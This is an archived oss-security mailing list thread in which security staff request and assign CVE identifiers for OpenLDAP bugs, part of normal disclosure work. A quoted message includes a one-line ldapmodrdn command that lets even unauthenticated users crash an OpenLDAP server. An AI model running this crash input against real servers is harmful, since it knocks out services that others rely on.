Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Tue, 1 Mar 2011 16:13:42 -0500 (EST)
From: Josh Bressers <bressers@...hat.com>
To: Thomas Biege <thomas@...e.de>
Cc: "Steven M. Christey" <coley@...us.mitre.org>,
        oss-security@...ts.openwall.com
Subject: Re: CVE Request -- OpenLDAP -- two issues

Please use CVE-2011-1081 for this new DoS.

Thanks.

-- 
    JB


----- Original Message -----
> The following might also need a CVE-ID.
> 
> https://bugzilla.novell.com/show_bug.cgi?id=674985#c1
> ------------------------------------------------------------------------------
> http://www.openldap.org/its/index.cgi/Software Bugs?id=6768
> 
> That's a pretty bad DOS. Everybody (even unauthenticated users) can
> kill the
> server by submitting a MODRDN request with an empty "olddn" value and
> "remove
> old RDN" set (-r). Example:
> 
> ldapmodrdn -x -H ldap://ldapserver -r '' o=test
> ------------------------------------------------------------------------------
> 
> 
> Am Freitag 25 Februar 2011 17:18:08 schrieb Josh Bressers:
> > ----- Original Message -----
> > > Hello Josh, Steve, vendors,
> > >
> > > looks like the following two issues did not get a CVE identifiers
> > > yet:
> > > [1] http://secunia.com/advisories/43331/
> >
> > The above advisory covers both bugs below.
> >
> >
> > > [2] http://www.openldap.org/its/index.cgi/Software%20Bugs?id=6607
> >
> > CVE-2011-1024 openldap forwarded bind failure messages cause success
> >
> >
> > > [3] http://www.openldap.org/its/index.cgi/Software%20Bugs?id=6661
> >
> > CVE-2011-1025 openldap rootpw is not verified with slapd.conf
> >
> >
> > Thanks.
> >
> >
> 
> --
> Thomas Biege <thomas@...e.de>, SUSE LINUX, Security Support & Auditing
> SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
> --
> Wer aufhoert besser werden zu wollen, hoert auf gut zu sein.
> -- Marie von Ebner-Eschenbach

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ